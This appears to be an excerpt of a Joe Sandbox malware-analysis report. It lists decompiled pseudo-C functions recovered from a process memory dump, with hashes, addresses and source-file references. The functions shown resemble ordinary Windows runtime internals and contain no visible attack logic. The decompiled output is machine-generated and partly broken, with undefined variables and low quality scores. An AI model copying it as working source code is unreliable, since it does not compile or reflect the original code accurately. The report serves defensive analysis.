Opcode ID: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
Instruction ID: c8e2ecba4a7c79bc64052d2c432b030ef2c4cb5ca8f6647846e8da68ca87cb90
Opcode Fuzzy Hash: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
Instruction Fuzzy Hash: FB112572705AD09BE3229B95E884B2977D9FF01B68F0900A8DE009BA62E338F800D750

Uniqueness

Uniqueness Score: -1.00%

Function 04D3E3DD Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04D3E3DD(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int* _v8;
				void* _t12;
				void* _t13;
				signed int* _t15;
				void* _t18;
				signed int _t26;
				intOrPtr* _t28;
				intOrPtr _t31;

				_t20 = __ecx;
				_push(__ecx);
				_t18 = __edx;
				_v8 = __ecx;
				_t28 = E04CB9630(_a4, __edx,  *_a8);
				if(_t28 == 0) {
					L8:
					_t12 = 0;
				} else {
					while(1) {
						_t31 =  *_t28;
						if(_t31 == 0) {
							goto L8;
						}
						if(_t31 < 0) {
							L7:
							_t28 = _t28 + 4;
							if(_t28 != 0) {
								continue;
							} else {
								goto L8;
							}
						} else {
							_t13 = E04CB9630(_a4, _t18,  *_t28);
							if(_t13 == 0) {
								L11:
								_t12 = 0xc000008b;
							} else {
								_t5 = _t13 + 2; // 0x2
								_t26 = _t5;
								if(_t26 == 0) {
									goto L11;
								} else {
									_t15 = E04CC5D90(_t20,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 8);
									if(_t15 == 0) {
										_t12 = 0xc0000017;
									} else {
										_t20 = _t15;
										 *_t15 =  *_t15 & 0x00000000;
										_t15[1] = _t26;
										E04D3E5FE(_t15, _v8 + 8);
										goto L7;
									}
								}
							}
						}
						goto L9;
					}
					goto L8;
				}
				L9:
				return _t12;
			}

0x04d3e3dd
0x04d3e3e2
0x04d3e3eb
0x04d3e3ed
0x04d3e3f9
0x04d3e3fd
0x04d3e44a
0x04d3e44a
0x04d3e3ff
0x04d3e3ff
0x04d3e3ff
0x04d3e402
0x00000000
0x00000000
0x04d3e404
0x04d3e445
0x04d3e445
0x04d3e448
0x00000000
0x00000000
0x00000000
0x00000000
0x04d3e406
0x04d3e40c
0x04d3e413
0x04d3e45a
0x04d3e45a
0x04d3e415
0x04d3e415
0x04d3e415
0x04d3e41a
0x00000000
0x04d3e41c
0x04d3e429
0x04d3e430
0x04d3e453
0x04d3e432
0x04d3e435
0x04d3e437
0x04d3e43a
0x04d3e440
0x00000000
0x04d3e440
0x04d3e430
0x04d3e41a
0x04d3e413
0x00000000
0x04d3e404
0x00000000
0x04d3e3ff
0x04d3e44c
0x04d3e450

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d78969a3de063c0e7614b86bbe96c2a5dc513fbd87671afc715f87d050cf35f
Instruction ID: a58b87e25a687dd5ba6551d596d787ba5cfafc2f8c3f6691fcef425a7c39c9ff
Opcode Fuzzy Hash: 1d78969a3de063c0e7614b86bbe96c2a5dc513fbd87671afc715f87d050cf35f
Instruction Fuzzy Hash: C8019672700104AFEB215F44C804B56BBA5FB89756F098124E9449B1E0E775FD41EB90

Uniqueness

Uniqueness Score: -1.00%

Function 04D46E30 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04D46E30(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04CF2DC0();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E04CF2A60();
					if( *_t27 != 0) {
						_push( *_t27);
						E04CF2A80();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E04CF2A80();
				return E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x04d46e38
0x04d46e3d
0x04d46e46
0x04d46e48
0x04d46e49
0x04d46e4a
0x04d46e4b
0x04d46e4e
0x04d46e4f
0x04d46e51
0x04d46e56
0x04d46e56
0x04d46e5c
0x04d46e5e
0x04d46e60
0x04d46e60
0x04d46e63
0x04d46e64
0x04d46e66
0x04d46e68
0x04d46e6f
0x04d46e71
0x04d46e73
0x04d46e73
0x04d46e6f
0x04d46e78
0x04d46e7e
0x04d46e8d
0x04d46e8d
0x04d46e92
0x04d46e94
0x04d46ead

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa0e8ad1fd9cf952fb7734a090ea498649bc36d7f311b36011489c6a9e7816af
Instruction ID: f74f13f06f24cf06171bd0ffc02f5bf9bc334025ffb5e3e1b043ca4a1bff2a81
Opcode Fuzzy Hash: aa0e8ad1fd9cf952fb7734a090ea498649bc36d7f311b36011489c6a9e7816af
Instruction Fuzzy Hash: 3401D272140505BFEB21AF55CC80EA7F77EFF80395B004138F201425A0C726FCA1DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CAA200 Relevance: .1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CAA200(signed short* _a4, signed int _a8) {
				signed char _t20;
				signed short* _t29;
				void* _t30;
				signed int _t34;
				intOrPtr* _t35;

				if((_a8 & 0xfffffffe) != 0) {
					L8:
					return 0;
				}
				_t29 = _a4;
				_t20 =  *_t29 & 0x0000ffff;
				if(_t20 == 0 || (_t20 & 0x00000001) != 0) {
					goto L8;
				} else {
					_t34 = _t20 + 0x0000001f & 0xfffffff8;
					_t35 = E04CC5D90(_t30,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t34);
					if(_t35 == 0) {
						goto L8;
					}
					 *(_t35 + 8) = _t34;
					 *((intOrPtr*)(_t35 + 4)) = 1;
					 *_t35 = 1;
					if((_a8 & 1) != 0) {
						 *((intOrPtr*)(_t35 + 0xc)) = 1;
					}
					 *((intOrPtr*)(_t35 + 0x10)) = 1;
					 *((intOrPtr*)(_t35 + 0x14)) = ( *_t29 & 0x0000ffff) + 8;
					_t17 = _t35 + 0x18; // 0x18
					E04CF88C0(_t17, _t29[2],  *_t29 & 0x0000ffff);
					return _t35;
				}
			}

0x04caa20f
0x04caa27a
0x00000000
0x04caa27a
0x04caa211
0x04caa214
0x04caa21a
0x00000000
0x04caa220
0x04caa229
0x04caa237
0x04caa23b
0x00000000
0x00000000
0x04caa23f
0x04caa243
0x04caa246
0x04caa24b
0x04caa275
0x04caa275
0x04caa253
0x04caa256
0x04caa260
0x04caa264
0x00000000
0x04caa26c

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
Instruction ID: c36154a1209c4dad8adbb1ebc8f8a8a838d255a7ce59c5f2562c7bf87f8def71
Opcode Fuzzy Hash: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
Instruction Fuzzy Hash: 08010471605712ABCB208F15D840A327BA5EB45768700862DF8998B290D732E620DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CB6179 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E04CB6179(void* __esi) {
				intOrPtr _t15;
				void* _t26;
				intOrPtr _t27;
				void* _t33;
				void* _t35;

				_t33 = __esi;
				_t15 =  *((intOrPtr*)(_t35 - 0x134));
				 *((intOrPtr*)(_t35 - 0x118)) = _t15;
				if(_t15 != 0) {
					_push(4);
					_push(_t35 - 0x118);
					_push(5);
					_push(0xfffffffe);
					E04CF2A60();
					 *((intOrPtr*)(_t35 - 0x170)) = 0;
					_push(4);
					_push(_t35 - 0x170);
					_push(0x12);
					_push(0xfffffffe);
					E04CF2A60();
					 *((short*)(_t35 - 0x124)) = 0;
					_push(2);
					_push(_t35 - 0x124);
					_push(4);
					_push( *((intOrPtr*)(_t35 - 0x118)));
					E04CF2F70();
					_push( *((intOrPtr*)(_t35 - 0x118)));
					E04CF2A80();
					 *((intOrPtr*)(_t35 - 0x118)) = 0;
					_push(4);
					_push(_t35 - 0x118);
					_push(5);
					_push(0xfffffffe);
					E04CF2A60();
				}
				_t26 = E04CECE3F( *((intOrPtr*)(_t35 - 0x12c)));
				_t32 =  *((intOrPtr*)(_t35 - 0x2c));
				if( *((intOrPtr*)(_t35 - 0x2c)) != 0) {
					asm("lock xadd [ecx+0x4], esi");
					if(_t33 == 1) {
						_t27 =  *0x4da6644; // 0x0
						return E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27 + 0x300000,  *_t32);
					}
				}
				return _t26;
			}

0x04cb6179
0x04cb6179
0x04cb617f
0x04cb6187
0x04d10b44
0x04d10b4c
0x04d10b4d
0x04d10b4f
0x04d10b51
0x04d10b56
0x04d10b60
0x04d10b68
0x04d10b69
0x04d10b6b
0x04d10b6d
0x04d10b74
0x04d10b7b
0x04d10b83
0x04d10b84
0x04d10b86
0x04d10b8c
0x04d10b91
0x04d10b97
0x04d10b9c
0x04d10ba6
0x04d10bae
0x04d10baf
0x04d10bb1
0x04d10bb3
0x04d10bb3
0x04cb6193
0x04cb6198
0x04cb619d
0x04cb619f
0x04cb61a5
0x04cb61a7
0x00000000
0x04cb61bd
0x04cb61a5
0x04cb61c2

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ebe6e94a29c87f92b04348051b4b6ea3033ebd45c0671d6da94b84ac4dab628
Instruction ID: 726bf78d32207240483edef7ac27ea0aff30e1c0ce1f4857236bae4a35033378
Opcode Fuzzy Hash: 5ebe6e94a29c87f92b04348051b4b6ea3033ebd45c0671d6da94b84ac4dab628
Instruction Fuzzy Hash: 1711A030A01218ABEB75EB24CC01FE87276FF04714F1041E4A319A61E0DB35AE91DF84

Uniqueness

Uniqueness Score: -1.00%

Function 04CE6CC0 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E04CE6CC0(void* __ecx, void* __eflags, signed short* _a4, char* _a8) {
				short _v12;
				void* _t16;
				void* _t20;
				char* _t28;
				void* _t32;

				_push(__ecx);
				_push(__ecx);
				E04CCDF36(0, _a4, 0x14d0);
				_t28 = _a8;
				_t32 = E04CD015C( *((intOrPtr*)( *[fs:0x30] + 0x38)), _a4, 0, _t28,  &_v12);
				if(_t32 < 0 ||  *_t28 == 0) {
					_t20 = 0x14d3;
				} else {
					_t20 = (0 | _v12 == 0x00000000) + 0x14d1;
				}
				E04CCDF36(0, _a4, _t20);
				if(_t32 < 0) {
					_t16 = _t32;
				} else {
					if(_v12 == 0) {
						if( *_t28 != 0) {
							 *_t28 = 0;
						}
					}
					_t16 = 0;
				}
				return _t16;
			}

0x04ce6cc5
0x04ce6cc6
0x04ce6cdc
0x04ce6ce1
0x04ce6cf5
0x04ce6cf9
0x04ce6d37
0x04ce6d00
0x04ce6d09
0x04ce6d09
0x04ce6d15
0x04ce6d1c
0x04ce6d3e
0x04ce6d1e
0x04ce6d23
0x04ce6d30
0x04ce6d32
0x04ce6d32
0x04ce6d30
0x04ce6d25
0x04ce6d25
0x04ce6d2a

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d952b55ae5c06c589b756f72370e52ee0d53ea04a3394b42dd51e4334f57892a
Instruction ID: 7a418fc680d59f11a7460ca6de5b545625487c5c891b945c21bdfcfd03465c17
Opcode Fuzzy Hash: d952b55ae5c06c589b756f72370e52ee0d53ea04a3394b42dd51e4334f57892a
Instruction Fuzzy Hash: 820128717141556BDB259B17C404BBF7F6BEB50720F854019E9065B280E774FA80C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 04CA6DA6 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E04CA6DA6(char __ecx) {
				void* _v12;
				void* _t15;
				char _t17;
				void* _t21;
				char _t25;
				char _t27;
				intOrPtr* _t31;
				signed int _t32;
				signed int _t33;

				_t33 = _t32 & 0xfffffff8;
				_push(__ecx);
				_t27 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t21 = 0;
					E04CBFED0(0x4da5220);
					_t24 =  *((intOrPtr*)(_t27 + 0x18));
					if(E04D39174( *((intOrPtr*)(_t27 + 0x18))) != 0) {
						L9:
						_push(0x4da5220);
						E04CBE740(_t24);
						_t15 = _t21;
						L2:
						return _t15;
					}
					_t24 = _t27;
					_t21 = E04D38D4D(_t27, _t25);
					if(_t21 < 0) {
						goto L9;
					}
					_t31 =  *0x4da5240; // 0x0
					while(_t31 != 0x4da5240) {
						_t17 =  *((intOrPtr*)(_t31 + 0x18));
						_t31 =  *_t31;
						 *((intOrPtr*)(_t33 + 0xc)) = _t17;
						if(_t17 != 0) {
							_t24 = _t17;
							 *0x4da91e0( *((intOrPtr*)(_t27 + 0x30)),  *((intOrPtr*)(_t27 + 0x18)),  *((intOrPtr*)(_t27 + 0x20)), _t27);
							 *((intOrPtr*)(_t33 + 0x1c))();
						}
					}
					goto L9;
				}
				_t15 = 0;
				goto L2;
			}

0x04ca6dab
0x04ca6dae
0x04ca6dbf
0x04ca6dc1
0x04d09be0
0x04d09be2
0x04d09be7
0x04d09bf1
0x04d09c33
0x04d09c33
0x04d09c38
0x04d09c3d
0x04ca6dc9
0x04ca6dcf
0x04ca6dcf
0x04d09bf3
0x04d09bfa
0x04d09bfe
0x00000000
0x00000000
0x04d09c00
0x04d09c2b
0x04d09c08
0x04d09c0b
0x04d09c0d
0x04d09c13
0x04d09c19
0x04d09c21
0x04d09c27
0x04d09c27
0x04d09c13
0x00000000
0x04d09c2b
0x04ca6dc7
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb973522acad8152c1075ca98817c0566fd1d294e04b731a03caf9d63c31589a
Instruction ID: 9f4a57e63ec5fabbcbeb6b830bd3ec6d9a6d1e251b87bfafcc32e45e11e00845
Opcode Fuzzy Hash: bb973522acad8152c1075ca98817c0566fd1d294e04b731a03caf9d63c31589a
Instruction Fuzzy Hash: 0A0168B1B00606AFD7106E25ACA0AA673F6FB80328F444178F84183681DB60FC21DAD0

Uniqueness

Uniqueness Score: -1.00%

Function 04D3C490 Relevance: .0, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E04D3C490(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				signed char* _t27;
				void* _t33;
				intOrPtr _t35;
				void* _t42;
				intOrPtr _t44;
				void* _t45;
				intOrPtr _t47;
				signed int _t48;

				_v8 =  *0x4dab370 ^ _t48;
				_v20 = __ecx;
				_v66 = 0xd22;
				_t41 = _a24;
				_v40 = _a20;
				_v16 = _a12;
				_v36 = _a24;
				_v32 = __edx;
				_v28 = _a4;
				_v24 = _a8;
				_v12 = _a16;
				_t26 = E04CC3C40();
				_t44 = _t42;
				_t47 = _t45;
				_t35 = _t33;
				if(_t26 == 0) {
					_t27 = 0x7ffe038e;
				} else {
					_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
				}
				_push( &_v72);
				_push(0x20);
				_push(0x20402);
				_push( *_t27 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t35, _v8 ^ _t48, _t41, _t44, _t47);
			}

0x04d3c49f
0x04d3c4a8
0x04d3c4ab
0x04d3c4b4
0x04d3c4bb
0x04d3c4c5
0x04d3c4cb
0x04d3c4ce
0x04d3c4d1
0x04d3c4d4
0x04d3c4d7
0x04d3c4da
0x04d3c4df
0x04d3c4e0
0x04d3c4e1
0x04d3c4e4
0x04d3c4f6
0x04d3c4e6
0x04d3c4ef
0x04d3c4ef
0x04d3c501
0x04d3c502
0x04d3c504
0x04d3c509
0x04d3c51a

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a7520ceffd5f71f2a9c6bbe3f11cc0b6e4a824a305d0bf4b8f4dffa26789551
Instruction ID: ee187d0bf834d1231e2e18034a9f41282ca7227ba6ca05d1f459dfacbf9e0ed0
Opcode Fuzzy Hash: 8a7520ceffd5f71f2a9c6bbe3f11cc0b6e4a824a305d0bf4b8f4dffa26789551
Instruction Fuzzy Hash: 4C11FAB1A102599FCB04DFA9D941AAEB7F8FF58704F10406AF905E7345D674EA01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04D46090 Relevance: .0, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D46090(void* __edx, intOrPtr* _a4, signed char _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _t15;
				void* _t22;
				intOrPtr _t23;
				signed char _t25;
				intOrPtr* _t27;
				intOrPtr* _t28;
				char* _t30;
				signed int _t32;
				intOrPtr* _t35;

				_t25 = _a8;
				if(_t25 <= 0xf) {
					_t15 =  *0x4da5d78; // 0x0
					_t32 = _t25 & 0x000000ff;
					_t30 = E04CC5D90(8 + _t32 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t15 + 0x140000, 8 + _t32 * 4);
					if(_t30 != 0) {
						_t27 = _a4;
						 *_t30 = 1;
						 *((intOrPtr*)(_t30 + 2)) =  *_t27;
						 *((short*)(_t30 + 6)) =  *((intOrPtr*)(_t27 + 4));
						 *(_t30 + 1) = _t25;
						if(_t25 == 0) {
							L8:
							 *_a16 = _t30;
							_t22 = 0;
							L9:
							return _t22;
						}
						_t28 = _a12;
						_t11 = _t30 + 8; // 0x8
						_t35 = _t11;
						do {
							_t23 =  *_t28;
							_t28 = _t28 + 4;
							 *_t35 = _t23;
							_t35 = _t35 + 4;
							_t32 = _t32 - 1;
						} while (_t32 != 0);
						goto L8;
					}
					_t22 = 0xc0000017;
					goto L9;
				}
				return 0xc000000d;
			}

0x04d46096
0x04d4609c
0x04d460a5
0x04d460ab
0x04d460ca
0x04d460ce
0x04d460d7
0x04d460da
0x04d460df
0x04d460e6
0x04d460ea
0x04d460ef
0x04d46108
0x04d4610b
0x04d4610d
0x04d4610f
0x00000000
0x04d4610f
0x04d460f1
0x04d460f5
0x04d460f5
0x04d460f8
0x04d460f8
0x04d460fa
0x04d460fd
0x04d460ff
0x04d46102
0x04d46102
0x00000000
0x04d46107
0x04d460d0
0x00000000
0x04d460d0
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c797e07155073bddbe2a75f8bccf373088021c22f44accb95e31af57090210d
Instruction ID: 9cdfef2ff32e6c1e7aaf9527d57ad04f54be5c8d1e32c80d09a87f782543ff7a
Opcode Fuzzy Hash: 8c797e07155073bddbe2a75f8bccf373088021c22f44accb95e31af57090210d
Instruction Fuzzy Hash: E611A1727441469FD711CF68D810BA2BBF9FB9A314F088159E8498B312DB36FC85DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CEE4EF Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04CEE4EF(signed int __eax, void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t31 = __ecx + 0x1c;
					L04CC2330(_t10, __ecx + 0x1c);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					L04CC2330( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4da687c);
					_push(_t28);
					L04CD9B40(0x4da687c, _t28, _t31, 0x4da68a4);
					E04CC24D0(0x4da687c);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E04CC24D0(_t31);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x04cee4f4
0x04cee4f8
0x04cee4fd
0x04cee502
0x04cee503
0x04d2907d
0x04d29081
0x04d29095
0x04d29098
0x04d2909d
0x04d290a3
0x04d290a9
0x04d290b1
0x04d290b4
0x04d290b9
0x04d290c1
0x04d290ce
0x04d290ce
0x04d290de
0x04d290de
0x04cee50d

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d2a9a1e1ff8a13951cfc3c828b9ec3598bc8e133711cc247d4f0a8e2bf13f1
Instruction ID: 16987d237c4a8f478a43fb5ade8487b43338ad5b6c1f55705861a4cb6ae490dd
Opcode Fuzzy Hash: 27d2a9a1e1ff8a13951cfc3c828b9ec3598bc8e133711cc247d4f0a8e2bf13f1
Instruction Fuzzy Hash: D801BCB1700A44BBE220AB79CD80E53B7ADFF84668F040169F505835A0DB24FC01DAE0

Uniqueness

Uniqueness Score: -1.00%

Function 04D46550 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04D46550(intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				char _v636;
				char _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t22;
				intOrPtr _t23;
				char* _t26;
				intOrPtr _t27;
				signed int* _t29;
				intOrPtr _t30;
				signed int _t32;
				intOrPtr _t33;
				signed int _t34;

				_t36 = (_t34 & 0xfffffff8) - 0x27c;
				_v8 =  *0x4dab370 ^ (_t34 & 0xfffffff8) - 0x0000027c;
				_t22 = _a4;
				_t29 = _a8;
				if(_t22 == 0xffffffff || _t29 == 0) {
					_t32 = 0xc000000d;
				} else {
					_t32 = 0;
					 *_t29 = 0;
					if(E04CC3C40() != 0) {
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					} else {
						_push(0);
						_push(0x270);
						_push( &_v636);
						_push(0x27);
						_push(0);
						E04CF3E50();
						_t26 =  &_v656;
					}
					 *_t29 = 0 |  *((intOrPtr*)(_t26 + 0x18)) == _t22;
				}
				_pop(_t30);
				_pop(_t33);
				_pop(_t23);
				return E04CF4B50(_t32, _t23, _v8 ^ _t36, _t27, _t30, _t33);
			}

0x04d46558
0x04d46565
0x04d4656d
0x04d46572
0x04d46578
0x04d465b9
0x04d4657e
0x04d4657e
0x04d46580
0x04d46589
0x04d465aa
0x04d4658b
0x04d4658b
0x04d4658c
0x04d46595
0x04d46596
0x04d46598
0x04d46599
0x04d4659e
0x04d4659e
0x04d465b5
0x04d465b5
0x04d465c7
0x04d465c8
0x04d465c9
0x04d465d4

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c38d90efce1669d38a50f7f8f7ceb863b4af651eda80f052a63a0a7fd3f3905e
Instruction ID: fd68092a3b6d009747e7b47c654a799546bd43e94457026e593b824a113cad58
Opcode Fuzzy Hash: c38d90efce1669d38a50f7f8f7ceb863b4af651eda80f052a63a0a7fd3f3905e
Instruction Fuzzy Hash: 2A01D8322146119BD724DF64C848A67B7A9EF95664F100229F969872C0E738F911C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2010 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E04CF2010(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void* __esi;
				intOrPtr _t27;
				char* _t31;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t38;

				_v8 =  *0x4dab370 ^ _t38;
				_t35 = _a16;
				_push(0);
				_v16 = _a4;
				_push(0);
				_v12 = _a8;
				_push(_a24);
				_push(_a12);
				_push(_a20);
				_push(_a16);
				_push( &_v16);
				_t37 = E04CF4690();
				if(E04CC3C40() != 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
				} else {
					_t31 = 0x7ffe038e;
				}
				if( *_t31 != 0) {
					if(_t37 >= 0) {
						E04D3C592(_a20, _v16, _v12);
					}
				}
				return E04CF4B50(_t37, _t27, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x04cf201f
0x04cf2028
0x04cf202c
0x04cf202e
0x04cf2034
0x04cf2036
0x04cf203c
0x04cf203d
0x04cf203e
0x04cf2044
0x04cf2045
0x04cf204b
0x04cf2054
0x04d29f92
0x04cf205a
0x04cf205a
0x04cf205a
0x04cf2062
0x04d29f9f
0x04d29fae
0x04d29fae
0x04d29f9f
0x04cf2076

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

